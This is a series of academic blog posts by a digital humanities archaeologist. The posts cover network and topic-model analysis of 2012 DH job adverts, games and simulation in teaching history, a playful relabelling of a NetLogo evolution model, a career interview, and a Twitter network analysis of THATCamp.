Text Analysis of 2012 Digital Humanities Job Adverts, Part 2

If we look at simple word frequencies in the 2012 job advertisement documents for Digital Humanities, we find these top words and raw frequency counts:

research    650
university    577
experience    499
library    393
work    334
information    303
position    299
project    269
applications    257

(I’ve deleted ‘digital’ and ‘humanities’ from this list).
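Counts like these are easy to reproduce. Here is a minimal Python sketch of the recipe – tokenize, drop stopwords (including the corpus-defining terms ‘digital’ and ‘humanities’), count – using an invented scrap of advert text and a hypothetical stopword list:

```python
import re
from collections import Counter

# Hypothetical stopword list; a real run would use a much fuller one.
STOPWORDS = {"digital", "humanities", "the", "of", "and", "a", "to", "in", "for", "with"}

def top_words(text, n=10):
    """Tokenize, drop stopwords, and return the n most frequent words."""
    words = re.findall(r"[a-z]+", text.lower())
    counts = Counter(w for w in words if w not in STOPWORDS)
    return counts.most_common(n)

advert = "The university seeks research experience. Research library work. Digital humanities research."
print(top_words(advert, 3))  # 'research' tops the list with 3 occurrences
```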

If job advertisements are a way of signalling what an institution hopes the future will hold, one gets the sense that the focus of digital humanities work will be on projects, on research, in conjunction with libraries. But we can extract more nuance, using network analysis. You can feed the texts into Voyant’s ‘RezoViz’ tool, which extracts paired nouns in each document.

This can be output as a .net file and then imported into Gephi. The resulting graph has 1461 nodes and 20649 edges. Of course, there are some duplicates (like ‘US’ and ‘United States’), but this is only meant to be rough and ready, ‘generative’, as it were (and note also that a network visualization is not necessary for the analysis – so no spaghetti balls; what’s important are the metrics). What I’d like to find out is which concepts are doing the heavy lifting in these job advertisements. What is the hidden structure of the future of digital humanities, as evidenced by job advertisements in the English-speaking world?

My suspicion is that ‘modularity’ (aka ‘community detection’) and ‘betweenness centrality’ are going to be the key metrics for figuring this out. Modularity groups nodes on the basis of shared similar local patternings of ties (or, to put it another way, it decomposes the global network into maximal subnetworks). Seth Long recently did some network analysis on the Unabomber’s manifesto, and lucidly explains why betweenness centrality is a useful metric for understanding semantic meaning: “A word with high betweenness centrality is a word through which many meanings in a text circulate.” In other words, the heavy lifters.
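Both metrics can be computed outside Gephi, too. Below is a rough sketch using the networkx library on a tiny invented co-occurrence graph (in practice you would load the RezoViz export with nx.read_pajek); greedy_modularity_communities stands in for Gephi’s modularity routine:

```python
import networkx as nx
from networkx.algorithms.community import greedy_modularity_communities

# A toy co-occurrence graph standing in for the RezoViz export;
# the words and edges are invented for illustration.
G = nx.Graph()
G.add_edges_from([
    ("research", "university"), ("research", "library"),
    ("research", "metadata"), ("metadata", "METS"),
    ("metadata", "MODS"), ("university", "library"),
])

# Betweenness centrality: words through which many shortest paths run.
bc = nx.betweenness_centrality(G)
heavy_lifters = sorted(bc, key=bc.get, reverse=True)
print(heavy_lifters[0])  # the biggest 'heavy lifter' in this toy graph

# Modularity-based community detection, akin to Gephi's modularity routine.
communities = greedy_modularity_communities(G)
print([sorted(c) for c in communities])
```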

So let’s peer into the future.

I ended up with about 15 groups. The first three groups by modularity account for 75% of the nodes, and 80% of the ties. These are the groups where the action lies. So let’s look at words with the highest betweenness centrality scores for those first three groups.

The First Group

METS (Metadata encoding and transmission standard)
United States
New York

‘University’ is not surprising, and not useful. So let us discard it and bring in the next highest word:


This one group by modularity also has all of the highest betweenness centrality scores – and it reads like a laundry list of the skills a budding DH practitioner must hold. The US and New York would seem to be the centre of the world, too.

If we take the next ten words, we get:

MODS (Metadata Object Description Schema)
University Libraries
CLIR (Council on Library and Information Resources)
University of Alberta
North America
Duke University

Again, skills and places figure – in Canada, U of A appears. So far, the impression is that DH is all about text, markup, and metadata. Our favorite programming languages are python and ruby. We use php, xhtml, xml, and drupal (plain-jane vanilla html eventually turns up in the list, but it’s buried very, very deep).

So that’s an impression of the first group. (Remembering that groups are defined by patterns of similarity in their linkages).

The Second Group

The next group looks like this:
Digital Humanities
Department of Digital Humanities
Department of History

“digital humanities” is probably not helpful, so let’s eliminate that and go one more down: “US”. Indeed, let’s take a look at the next ten, too:

Human Resources
Computer Science
Head of School
Faculty of Humanities
University of Amsterdam

Here, we’re dealing very much with a UK, Ireland, and European focus. The ‘BCE’ is telling, for it suggests an archaeological focus in there, somewhere (unless this is some new DH acronym of which I’m not aware; I’m assuming ‘before the common era’).

The Third Group

In the final group we’ll consider here, we find a strong Canadian focus:

CRC (Canada Research Chair)
TEI (Text Encoding Initiative)
Canada Research Chair
Digital Humanities Summer Institute
University of Victoria

Since we’ve got some duplication in here, let’s look at the next ten:

ETCL (Electronic Textual Cultures Laboratory, U Victoria)
University of Waterloo
DHSI (Digital Humanities Summer Institute)
Faculty of Arts
Stratford Campus

‘Canada Research Chairs’ are well-funded government appointments, and so give an indication of where the state would like to see some research. Victoria continually punches above its weight, with look-ins from Waterloo and Concordia.

So what have we learned? Well, despite the efforts of the digital history community, ‘digital humanities’ is still largely a literary endeavor – although it’s quite possible that a lot of the marking up that these job advertisements envision could be of historical documents. Invest in some python skills (see the Programming Historian). My friends in government tell me that if you can data mine, you’ll be set for life, as the government is looking for those skills. (Alright, that didn’t come out in this analysis at all, but one of them is looking over my shoulder right now).

Finally – London, Dublin, New York, Edmonton, Victoria, Waterloo, Montreal – these seem to be the geographic hotspots. Speaking of temperature, Victoria has the nicest weather. Go there, young student!

Or come to Carleton and study with me.  We’ve got tunnels.

Update, March 4th: In the analysis above, I generated a network using Voyant’s RezoViz tool. Today, I topic modelled all of the texts, looking for 10 topics – so, a slightly different approach. I turned the resulting document composition (i.e. doc 1 is 44% topic 1, 22% topic 4, 10% topic 3, etc.) into a two-mode graph, job advert to top two constituent topics. I then turned this into a one-mode graph where job adverts are tied to other job adverts based on topic composition. Then I ran modularity, and found 3 groups; edges are percent composition by topics discerned through topic modeling, and nodes are sized by betweenness centrality. Most between? George Mason University. I’m not sure what ‘betweenness centrality’ means in this context, yet.
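The two-mode to one-mode step can be sketched with networkx’s bipartite helpers. The document compositions below are invented for illustration, and this projection weights advert-to-advert ties simply by the number of shared topics (a cruder scheme than the percent-composition weighting described above):

```python
import networkx as nx
from networkx.algorithms import bipartite

# Hypothetical MALLET-style output: each advert's top two topics with proportions.
doc_topics = {
    "advert_1": [("topic_1", 0.44), ("topic_4", 0.22)],
    "advert_2": [("topic_1", 0.38), ("topic_3", 0.30)],
    "advert_3": [("topic_4", 0.50), ("topic_3", 0.25)],
}

# Build the two-mode (advert-topic) graph...
B = nx.Graph()
for doc, topics in doc_topics.items():
    for topic, proportion in topics:
        B.add_edge(doc, topic, proportion=proportion)

# ...then project onto the advert mode: adverts tied to adverts that share
# topics, with edge weight = number of shared topics.
G = bipartite.weighted_projected_graph(B, list(doc_topics))
print(G.number_of_edges())
```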

Makes for interesting clusters of job adverts. Topic model results to be discussed tomorrow.

Text Analysis of 2012 Digital Humanities Job Adverts


2012 was a good year for hirings in the digital humanities. See for yourself at this archive of DH jobs: http://jobs.lofhm.org/ Now: what do these job adverts tell us, if you’re a graduate student trying to find your way?

Next week, I’m speaking to the Underhill Graduate Students’ Colloquium at Carleton University on ‘Living the life electric: becoming a digital humanist’. It’s broadly autobiographical in that I’ll talk about my own idiosyncratic path into this field.

That’s quite the point: there’s no firm/accepted/typical/you-ought-to-do X recipe for becoming a digital humanist. You have to find your own way, though the growing body of courses, books, journals, blog-o-sphere and twitterverse certainly makes a huge difference.

But in the interests of providing perhaps a more satisfying answer, I’ll try my hand at data mining those job posts (some 150 of them) using Voyant and MALLET to see what augurs for the future of the field.

Feel free to explore the corpus uploaded into Voyant. In any graphs you produce, January is on the left, December is on the right. If you spot anything interesting/curious, let me know.

And, because word counts are amazing:

Word Count
digital 1082
research 650
university 577
experience 499
library 393
humanities 386
work 334
information 303
position 299
project 269
applications 257
new 223
faculty 222
development 216
collections 210
department 207
management 206
projects 195
knowledge 192
data 187
including 185
ability 182
services 180
teaching 180
history 177
libraries 176
skills 176
qualifications 172
technology 169
required 166
media 163
jobs 151
application 149
original 146
program 145
link 143
web 143
working 142
loading 140
related 140
staff 138
academic 137
communication 133
job 132
college 130
degree 127
professor 126
education 125
students 125
studies 123

Why I Play Games

(originally posted at #HIST3812, my course blog for this term’s History3812: Gaming and Simulations for Historians, at Carleton University).

I play because I enjoy video games, obviously, but I also get something else out of it. Games are a ‘lively art’; they are an expressive art, and the artistry lies in encoding rules (descriptions) about how the world works at some microlevel, and then in watching how this artistry is further expressed in the unintended consequences of those rules, their intersections, their cancellations, causing new phenomena to emerge.

This strikes me as the most profound use of humanities computation out there. Physicists tell us that the world is made of itty bitty things that interact in particular ways. In which case, everything else is emergent: including history. I’m not saying that there are ‘laws’ of human action; but we do live in this universe. So, if I can understand some small part of the way life was lived in the past, I can model that understanding, and explore the unintended outcomes of that understanding… and go back to the beginning and model those.

I grew up with the video game industry. Adventure? I played that. We had a VIC-20. If you wanted to play a game, you had to type it in yourself. There used to be a magazine (Compute!) that would have all of the code printed within, along with screenshots. Snake, Tank Wars – yep. My older brother would type, and I would read the individual letters (and spaces, and characters) out. After about a week, we’d have a game.

And there would be bugs. O lord, there were bugs.

When we could afford games, we’d buy text adventures from Infocom. In high school, my older brother programmed a quiz game as his history project for the year. Gosh, we were cool. But it was! Here we were, making the machine do things.

As the years went on, I stopped programming my own games. Graphics & technology had moved too fast. In college, we used to play Doom (in a darkened room, with the computer wired to the stereo. Beer often figured). We played SimCity. We played the original Civilization.

These are the games that framed my interactions with computers. Then, after I finished my PhD, I returned to programming when I realized that I could use the incredible artificial intelligences, the simulation engines, of modern games, to do research. To enhance my teaching.

I got into Agent Based Modeling, using the Netlogo platform. This turned my career around: I ceased to be a run-of-the-mill materials specialist (Roman archaeology), and became this new thing, a ‘digital humanist’. Turns out, I’m now an expert on simulation and history.

Cool, eh?

And it’s all down to the fact that I’m a crappy player of games. I get more out of opening the hood, looking at how the thing works. Civilization IV and V are incredible simulation engines. So: what kinds of history are appropriate to simulate? What kinds of questions can we ask? That’s what I’m looking forward to exploring with you (and of course, seeing what you come up with in your final projects).

But maybe a more fruitful question to start with, in the context of the final project of this course, is, ‘what is the strangest game you’ve ever played?’

What made it strange? Was it the content, the mechanics, the interface?

I played one once where you had to draw the platform with crayons, and then the physics engine would take over. The point was to try to get a ball to roll up to a star. Draw a teeter-totter under the star, and perhaps the ball would fall on it, shooting the star up to fall down on the ball, for instance. A neat way of interacting with the underlying physics of game engines.

I’d encourage everyone to think differently about what the games might be. For instance, I could imagine a game that shows real-time documents (grabbed from a database), and you have to dive into it, following the connected discourses (procedurally generated using topic models and network graphing software to find these – and if this makes no sense to you, take a quick peek at the Programming Historian) within it to free the voices trapped within…

This is why I play. Because it makes me think differently about the materials I encounter.

Evaluating Digital Work in the Humanities

Leave it to an archaeologist, but when I heard the CFP from Digital Humanities Now on ‘evaluating’ digital work, I immediately started thinking about typologies, about categorizing. If it is desirable to have criteria for evaluating DH work, then we should know roughly the different kinds of DH work, right? The criteria for determining ‘good’ or ‘relevant’, or other indications of value, will probably be different for different kinds of work.

In which case, I think there are at least two dimensions, though likely more, for creating typologies of DH work. The first – let’s call it the Owens dimension, in honour of Trevor’s post on the matter – extends along a continuum we could call ‘purpose’, from ‘discovery’ through to ‘justification’. In that vein I was mulling over the different kinds of digital archaeological work a few days ago. I decided that the closer to ‘discovery’ the work was, the more it fell within the worldview of the digital humanities.

The other dimension concerns computing skill/knowledge, and its explication. There are lots of levels of skill in the digital humanities. Me, I can barely work Git or other command-line interventions, though I’m fairly useful at agent simulation in Netlogo. It’s not the kinds of skills here I am thinking about, but rather how well we fill in the blanks for others. There is so much tacit knowledge in the digital world. Read any tutorial, and there’s always some little bit that the author has left out because, well, isn’t that obvious? Do I really need to tell you that? I’m afraid the answer is yes. “Good” work on this dimension is work that provides an abundance of detail about how the work was done, so that a complete neophyte can replicate it. This doesn’t mean that it has to be right there in the main body of the work – it could be in a detailed FAQ, a blog post, a stand-alone site, a post at Digital Humanities Q&A, whatever.

For instance, I’ve recently decided to start a project that uses Neatline. Having put together a couple of Omeka sites before, and having played around with adding plugins, I found that (for me) the documentation supporting Neatline is quite robust. Nevertheless, I became (and am still) stumped on the problem of the geoserver to serve up my georectified historical maps. Over the course of a few days, I discovered that since Geoserver is java-based, most website hosting companies charge a premium or monthly fee to host it. Not only that, it needs Apache Tomcat installed on the server first, to act as a ‘container’. I eventually found a site – Openshift – that would host all of this for free (! cost always being an issue for the one-man-band digital humanist), but this required me to install Ruby and Git on my machine, then to clone the repository to my own computer, then to drop a WAR file (as nasty as it sounds) into the webapps folder (but what is this? There are two separate webapps folders!), then ‘commit, push’ everything back to Openshift. Then I found some tutorials that were explicitly about putting Geoserver on Openshift, so I followed them to the letter… it turns out they’re out of date, and a lot can change online quite quickly.

If you saw any of my tweets on Friday, you’ll appreciate how much time all of this took… and at the end of the day, still nothing to show for it (though I did manage to delete the default html). Incidentally, Steve from Openshift saw my tweets and is coaching me through things, but still…

So: an important axis for evaluating work in the digital humanities is explication. Since so much of what we do consists of linking together lots of disparate parts, we need to spell out how all the different bits fit together and what the neophyte needs to do to replicate what we’ve just done. (Incidentally, I’m not slagging the Neatline or Omeka folks; Wayne Graham and James Smithies have been brilliant in helping me out – thank you, gentlemen!). The Programming Historian has an interesting workflow in this regard. The piece that Scott, Ian, and I put together on topic modelling was reviewed by folks who were definitely in the digital humanities world, but not necessarily well-versed in the skills that topic modeling requires. Their reviews, going over our step-by-step instructions, pointed out the many, many places where we were blind to our assumptions about the target audience. If that tutorial has been useful to anyone, it’s entirely thanks to the reviewers, John Fink, Alan MacEachern, and Adam Crymble.

So, it’s late. But measure digital humanities work along these two axes, and I think you’ll have useful clustering in order to further ‘evaluate’ the work.

Deformative Digital Archaeology

An archaeological visualization.

Is digital archaeology part of the digital humanities?

This isn’t to get into another who’s in/who’s out conversation. Rather, I was thinking about the ways archaeologists use computing in archaeology, and to what ends. The Computer Applications in Archaeology conference has been publishing proceedings since 1973, or longer than I’ve been on this earth. Archaeologists have been running simulations, doing spatial analysis, clustering, imaging, geophysicing, 3d modeling, neutron activation analyzing, x-tent modeling, etc., for what seems like ages.

Surely, then, digital archaeologists are digital humanists too? Trevor Owens has a recent post that sheds useful light on the matter. Trevor draws attention to the purpose behind one’s use of computational power – generative discovery versus justification of an hypothesis. For Trevor, if we are using computational power to deform our texts, we are trying to see things in a new light, new juxtapositions, to spark new insight. Ramsay talks about this too in Reading Machines (2011: 33), discussing the work of Jerome McGann and Lisa Samuels. “Reading a poem backward is like viewing the face of a watch sideways – a way of unleashing the potentialities that altered perspectives may reveal”. This kind of reading of data (especially, but not necessarily, through digital manipulation), does not happen very much at all in archaeology. If ‘deformance’ is a key sign of the digital humanities, then digital archaeologists are not digital humanists. Trevor’s point isn’t to signal who’s in or who’s out, but rather to draw attention to the fact that:

When we separate out the context of discovery and exploration from the context of justification, we end up clarifying the terms of our conversation. There is a huge difference between “here is an interesting way of thinking about this” and “this evidence supports this claim.”

This, I think, is important in the wider conversation concerning how we evaluate digital scholarship. We’ve used computers in archaeology for decades to try to justify or otherwise connect our leaps of logic and faith, spanning the gap between our data and the stories we’d like to tell. A digital archaeology that sat within the digital humanities would worry less about that, and concentrate more on discovery and generation, of ‘interesting way[s] of thinking about this’.

In a paper on Roman social networks and the hinterland of the city of Rome, I once argued (long before I’d ever heard the term digital humanities) that we should stop using GIS displaying North at the top of the map, that this was hindering our ability to see patterns in our data. I turned the map sideways – and it sent a murmur through the conference room as east-west patterns, previously not apparent, became evident. This, I suppose, is an example of deformation. Hey! I’m a digital humanist! But other digital work that I’ve been doing does not fall under this rubric of ‘deformation’.

My Travellersim simulation for instance uses agent based modeling to generate territories, and predict likely interaction spheres, from distributions of survey data. In essence, I’m not exploring but trying to argue that the model accounts for patterns in the data. This is more in line with what digital archaeology often does.

Archaeological Glitch Art, Bill Caraher

Bill Caraher, I suspect, has been reading many of the same things I have been lately, and has been thinking along similar lines. In a post on archaeological glitch art Bill has been changing file extensions to fiddle about in the insides of images of archaeological maps, then looking at them again as images:

“The idea of these last three images is to combine computer code and human codes to transform our computer mediate image of archaeological reality in unpredictable ways. The process is remarkably similar to analyzing the site via the GIS where we take the “natural” landscape and transform it into a series of symbols, lines, and text. By manipulating the code that produces these images in both random and patterned ways, we manipulate the meaning of the image and the way in which these images communicate information to the viewer. We problematize the process and manifestation of mediating between the experienced landscape and its representation as archaeological data.”

In the same way, Trevor uses augmented-reality smartphone translation apps set to translate Spanish text into English, but pointed at non-Spanish texts. It’s a bit like Mark Sample’s Hacking the Accident, where he uses an automatic dictionary substitution scheme (N+7, a favorite of the Oulipo group) to throw up interesting juxtapositions. A deformative digital archaeology could follow these examples. Accordingly, here’s my latest experiment along these lines.
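The N+7 substitution itself takes only a few lines of Python. This sketch uses a tiny invented ‘lexicon’ of nouns (Oulipo practice uses a full dictionary, replacing each noun with the one seven entries further on):

```python
def n_plus_7(text, lexicon, n=7):
    """Replace each word found in the lexicon with the word n entries
    further along, wrapping around at the end of the list."""
    replaced = []
    for word in text.split():
        if word in lexicon:
            word = lexicon[(lexicon.index(word) + n) % len(lexicon)]
        replaced.append(word)
    return " ".join(replaced)

# A toy alphabetical wordlist standing in for a real dictionary of nouns.
lexicon = ["amphora", "bird", "butterfly", "greek", "map", "model", "moth",
           "pattern", "pot", "site", "survey", "trench"]
print(n_plus_7("the butterfly on the map", lexicon))  # → the site on the trench
```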

Screen shot from the deformed Netlogo ‘Mimicry’ model

Let’s say we’re interested in the evolution of amphorae types in the Greco-Roman world. Let’s go to the Netlogo models library and, instead of building the ‘perfect’ archaeological model, select one of their evolutionary models – Wilensky’s ‘Mimicry’ model, which is about the evolution of monarch and viceroy butterflies – swapping in ‘amphora’ for ‘moth’ everywhere in the code and supporting documentation, and ‘Greeks’ for ‘birds’.

In the original model code, we are told:

“Batesian mimicry is an evolutionary relationship in which a harmless species (the mimic) has evolved so that it looks very similar to a completely different species that isn’t harmless (the model). A classic example of Batesian mimicry is the similar appearance of monarch butterfly and viceroy moths. Monarchs and viceroys are unrelated species that are both colored similarly — bright orange with black patterns. Their colorations are so similar, in fact, that the two species are virtually indistinguishable from one another.

The classic explanation for this phenomenon is that monarchs taste yucky. Because monarchs eat milkweed, a plant full of toxins, they become essentially inedible to birds. Researchers have documented birds vomiting within minutes of eating monarch butterflies. The birds then remember the experience and avoid brightly colored orange butterfly/moth species. Viceroys, although perfectly edible, avoid predation if they are colored bright orange because birds can’t tell the difference.”

This is what you get:

We have two types of amphorae here, which we are calling the ‘monarch’ type (type 1) and the ‘viceroy’ type (type 2).

This model simulates the evolution of monarchs and viceroys from distinguishable, differently colored types to indistinguishable mimics and models. At the simulation’s beginning there are 450 type 1s and type 2s distributed randomly across the world. The type 1s are all colored red, while the type 2s are all colored blue. They are also distinguishable (to the human observer only) by their shape: the letter “x” represents type 1s while the letter “o” represents type 2s. Seventy-five Greeks are also randomly distributed across the world.

When the model runs, the Greeks and amphorae move randomly across the world. When a Greek encounters an amphora it rejects the amphora, unless it has a memory that the amphora’s color is “desirable.” If a Greek consumes a monarch, it acquires a memory of the amphora’s color as desirable.

As amphorae are consumed, they are regenerated. Each turn, every amphora must pass two “tests” in order to reproduce. The first test is based on how many amphorae of that species already exist in the world. The carrying capacity of the world for each species is 225. The chances of regenerating are smaller the closer each population gets to 225. The second test is simply a random test to keep regeneration in check (set to a 4% chance in this model). When an amphora does regenerate, it either creates an offspring identical to itself or it creates a mutant. Mutant offspring are the same species but have a random color between blue and red, ending in five (e.g. color equals 15, 25, 35, 45, 55, 65, 75, 85, 95, 105). Both monarchs and viceroys have equal opportunities to regenerate mutants.

Greeks can remember up to MEMORY-SIZE desirable colors at a time. The default value is three. If a Greek has memories of three desirable colors and it encounters a monarch with a new desirable color, the Greek “forgets” its oldest memory and replaces it with the new one. Greeks also forget desirable colors after a certain amount of time.
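That oldest-memory-replaced rule is just a fixed-length queue. A minimal Python sketch, using the model’s default MEMORY-SIZE of three and its multiples-of-five color coding (the sequence of colors is invented for illustration):

```python
from collections import deque

MEMORY_SIZE = 3  # the model's default

# A Greek's memory of desirable colors: holds at most MEMORY_SIZE entries,
# and learning a new color silently discards the oldest one.
memory = deque(maxlen=MEMORY_SIZE)

for color in [15, 25, 35, 45]:  # the Greek consumes monarchs of four colors
    if color not in memory:
        memory.append(color)

print(list(memory))  # → [25, 35, 45]: the oldest color, 15, has been forgotten
```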

And when we run the simulation? Well, we’ve decided that one kind of amphora is desirable, another kind is undesirable. The undesirable ones respond to (human) consumer pressure and change their color; over time they evolve to the same color. Obviously, we’re talking as if the amphorae themselves have agency. But why not? (And see Gosden, ‘What do objects want?’) That’s one interesting side effect of this deformation.

As I haven’t changed the code so much as the labels, the original creator’s conclusions still seem apt:

Initially, the Greeks don’t have any memory, so both type 1 and type 2 are consumed equally. However, soon the Greeks “learn” that red is a desirable color and this protects most of the type 1s. As a result, the type 1 population makes a comeback toward carrying capacity while the type 2 population continues to decline. Notice also that as reproduction begins to replace consumed amphorae, some of the replacements are mutants and therefore randomly colored.

As the simulation progresses, Greeks continue to consume mostly amphorae that aren’t red. Occasionally, of course, a Greek “forgets” that red is desirable, but a forgetful Greek is immediately reminded when it consumes another red type 1. For the unlucky type 1 that did the reminding, being red was no advantage, but every other red amphora is safe from that Greek for a while longer. Type 1 (non-red) mutants are therefore apt to be consumed. Notice that throughout the simulation the average color of type 1 continues to be very close to its original value of 15. A few mutant type 1s are always being born with random colors, but they never become dominant, as they and their offspring have a slim chance for survival.

Meanwhile, as the simulation continues, type 2s continue to be consumed, but as enough time passes, the chances are good that some type 2s will give birth to red mutants. These amphorae and their offspring are likely to survive longer because they resemble the red type 1s. With a mutation rate of 5%, it is likely that their offspring will be red too. Soon most of the type 2 population is red. With its protected coloration, the type 2 population will return to carrying capacity.

The swapping of words makes for some interesting juxtapositions. ‘Protects’, from ‘consumption’? This kind of playful swapping is where the true potential of agent based modeling might lie, in its deformative capacity to make us look at our materials differently. Trying to simulate the past through ever more complicated models is a fool’s errand. A digital archaeology that sat in the digital humanities would use our computational power to force us to look at the materials differently, to think about them playfully, and to explore what these sometimes jarring deformations could mean.


Gosden, Chris. 2005. ‘What do objects want?’ Journal of Archaeological Method and Theory 12.3. DOI: 10.1007/s10816-005-6928-x

Ramsay, Stephen. 2011. Reading Machines. Towards An Algorithmic Criticism. U of Illinois Press.

Wilensky, U. (1997). NetLogo Mimicry model. http://ccl.northwestern.edu/netlogo/models/Mimicry. Center for Connected Learning and Computer-Based Modeling, Northwestern University, Evanston, IL.

Wilensky, U. (1999). NetLogo. http://ccl.northwestern.edu/netlogo/. Center for Connected Learning and Computer-Based Modeling, Northwestern University, Evanston, IL.

HIST3812, Gaming and Simulation for Historians

Finally, with a bit of space to breathe, I am turning to getting my HIST3812 Gaming and Simulation for Historians course put together. In response to student queries about what this course will explore, I’ve put together a wee comic book (to capture the aesthetic of playfulness about history that games & simulations naturally contain). I’m not a particularly good maker of comic books, but it does the trick, more or less.

See it on Issuu here

Digital Humanist Interview

I was interviewed recently by a student in Leslie Madsen-Brooks’ graduate seminar in digital history, HannaLore Hein. She posts her impressions of the interview on the course website here. It’s always interesting to see what you wrote come through someone else’s filters. Given a recent conversation on twitter, where Mike Widner and others have been discussing the results of text analysis/topic modeling on all of the posted interviews, I thought I’d post here the ur-text from our interview.

1. Did you begin your academic career wanting to be an archaeologist? How did your studies as an undergraduate and graduate student lead you to your current career?

I grew up in a family with a very strong interest in history. My brothers and I all teach at various levels in the system, and various aunts & other family members all taught too. It was rather a given… as for archaeology, I was attracted by the materiality of it. I love historical landscapes. Archaeology forces you to confront that history happens in space and place, with and through objects. I like stuff. It was a good fit!

But it all comes down to an opportunity I had at a junior college in Quebec (a CEGEP, as they’re called). I had the opportunity to go to Greece on a study tour, and then to return the following year on an excavation. We worked on a medieval Cistercian abbey, in which was buried a mutilated skeleton. Its treatment was consistent with traditions surrounding vampires, so… it rather hooks you in, an experience like that!

I studied classical archaeology at Wilfrid Laurier University in Waterloo Ontario. I wasn’t very tech minded in those days, though I had had a C-64 growing up, and had programmed my own games in BASIC. I had an exercise in one class in 1995 where we were asked to go onto this “World Wide Web” and create an annotated webography of sites related to the Etruscans. Less than impressed with what I found, I wrote an essay entitled, ‘Why the World Wide Web Will Never Be Useful For Academics’.

My ability to predict the future is thus suspect.

2. Did you always have a knack for technology? Was it something that came easily to you, or something you really had to work at to understand?

I’ve been breaking things since I was 3. I took our family piano apart when I was ten, dropping all of the hammers and rendering a B-Flat completely useless ever since. In the sense that I’ve never been afraid to tinker, to try to understand how things work, then yes, you could say I have a knack for technology. With our C-64, I used to buy magazines that printed out all of the code for games, utilities, and so on. I did a lot of that sort of thing, down in the basement… but I’m always working hard to figure out how things work, and what I might use them for. I get a kick out of helping other people too. I believe in failing gloriously and failing often. It’s only through that cycle – and being willing to share what happened – that we move forward. Recently a project website of mine was hacked. I was gutted – I lost a summer’s worth of work. But on the flip side, it was a great moment to share with the wider community so that it wouldn’t happen to them. I posted about it here: https://electricarchaeology.ca/2012/05/18/how-i-lost-the-crowd-a-tale-of-sorrow-and-hope/ and was really heartened to see the comments of support (and tweets) about what went on.

Too often we only talk about things that worked just like we thought they would. We need to have a discourse about things we try that didn’t – and why.

3. What jobs have you held previously? Were there any skills that you acquired at those positions that you still use today?

My very first job was as a janitor, responsible for the washrooms at a summer resort. Being a janitor taught patience and fortitude in the face of really annoying ….stuff….. More to your question though, I’ve taught at all levels from High School through to Continuing Ed. Until I joined the faculty at Carleton, I worked in the world of for-profit online education. I learned a lot about teaching and tech in those positions. I was a freelance heritage consultant at one point, with a couple of government contracts, where mission creep is a very real issue. Learn to say no, learn to draw the line. I also have a business with my family in what could be considered the heritage agritourism field. Again, though, I consider that a form of teaching – understanding customers, understanding students, can be very similar. That’s not to say that students are customers, mind you. Paying for tuition is like paying for ice time – it gets you on the ice, I’ll coach you, but you don’t necessarily get to hoist the Stanley Cup.

4. How advanced is your knowledge of computer science and programming? Is that a major component of your job?

I’m always reading, always learning – talking to the comp.sci folks, keeping up with what’s going on, and trying to identify which skills are the ones I need. There’s a lot to recommend just playing and tinkering though, in terms of teaching. When you are formally taught something, you tend to internalize that particular mode of doing whatever it is. I’m sure there are probably more effective ways of learning the skills I need, but this is what seems to work for me. I’ve heard of people getting credit towards tenure for ‘learning python’ or what have you, so that’s encouraging. Works like The Programming Historian are a fantastic resource, and I’m continually astounded by what other folks can do. I’m really a bit of a fraud. First day in the department, I couldn’t find the on switch for the Macs…. (I’m a pc guy).

5. What is your favorite form of digital communication? (Blogs, Twitter, etc.) What form do you think is most respected in the field? What form is the most “academically accepted?”

I have worked hard on my blog, from 2006 onwards, to make it a useful form of academic output for me. I thank Alan Liu and other participants at the 1st Nebraska Digital Humanities Workshop (where I’d been invited to present) for pushing me to blog. Once I started giving it away on my blog, I started getting traction in academia (that I wasn’t getting as a Romanist). A careful, thoughtful blog is a sine qua non for the digital humanist, as is a twitter account. I don’t care much for Facebook or Google +. In terms of ‘academically accepted’, I can show you structural reasons why blogs matter in terms of speaking beyond and to the academy. Someone has to generate the content on the internet, right? Experiments like the Journal of Digital Humanities and things like the LSE Impact Blog are slowly securing the short-form quick-publish genre as an accepted format of scholarly output. Blogging is a platform, not a genre. We shouldn’t confuse the two. In some senses, the journal article or monograph is the last stage of the process, an archive rather than a picture of developing scholarly output. That’s going to be the biggest change.

6. How do you balance your career/projects between the digital and traditional academic worlds?

Happily, I’m one of the first people in Canada to have ‘Digital Humanities’ as my job title, so I’m making it up as I go along.

7. I noticed on your blog that you cite extensively. Is that common practice among digital humanists?

Blogging as a platform has nothing to say about citations. I cite, because I want to give credit and to show where my original thought begins. It’s pretty common on academic blogs. Linking is a form of citation too.

If there is any other information that you think is pertinent to the field of digital humanities, especially in relation to public history, that I did not touch upon in my questions, I would love to hear your thoughts.

All digital history is public history, far as I’m concerned. Working online allows an interested public to become part of the project. Precious few have read my book; about a hundred people a day take a look at my blog.

Visualizing THATCamp

THATCamps are quite popular. I’m throwing one myself. But who are the people talking about them on Twitter? What does the THATCamp look like on the Twitterverse?

I used NodeXL to retrieve the data – a search for tweets, people, and the links between them. I then visualized the data in Gephi, where colour = community (per Gephi’s modularity routine) and sized the nodes (individual Twitterers) using PageRank, on the premise that this was a directed graph and one should follow the links (although there was little difference with Betweenness Centrality. Major players are still major, either way).
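For the curious, the ranking step can be sketched in pure Python. This toy sketch computes betweenness centrality on an invented five-node directed graph (the names are made up, not drawn from the THATCamp data); Gephi's routine does the same counting, only far more efficiently:

```python
# A rough sketch of betweenness centrality on a toy directed graph:
# count, for every ordered pair of nodes, how often each other node
# sits on the shortest directed paths between them.
from collections import deque, defaultdict
from itertools import permutations

edges = [
    ("alice", "hub"), ("bob", "hub"), ("carol", "hub"),
    ("hub", "dave"), ("dave", "bob"), ("carol", "alice"),
]
adj = defaultdict(list)
nodes = set()
for a, b in edges:
    adj[a].append(b)
    nodes.update([a, b])

def shortest_paths(s, t):
    """All shortest directed paths from s to t, found by BFS over paths."""
    best, found = None, []
    queue = deque([[s]])
    while queue:
        path = queue.popleft()
        if best is not None and len(path) > best:
            break                        # anything longer can't be shortest
        if path[-1] == t:
            best = len(path)
            found.append(path)
            continue
        for nxt in adj[path[-1]]:
            if nxt not in path:          # simple paths only
                queue.append(path + [nxt])
    return found

betweenness = defaultdict(float)
for s, t in permutations(nodes, 2):
    paths = shortest_paths(s, t)
    for p in paths:
        for mid in p[1:-1]:              # interior nodes only
            betweenness[mid] += 1 / len(paths)

# The bridging node dominates -- the node "through which many
# meanings circulate".
top = max(nodes, key=lambda n: betweenness[n])
print(top)   # hub
```

On this invented graph the 'hub' node comes out on top, just as @thatcamp does in the real data: most shortest paths have no choice but to pass through it.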

I found 233 individuals, linked together by 4435 edges. Some general stats on this directed network:

Top 10 Vertices, Ranked by Betweenness Centrality
thatcamp 10493.93299
marindacos 3381.65598
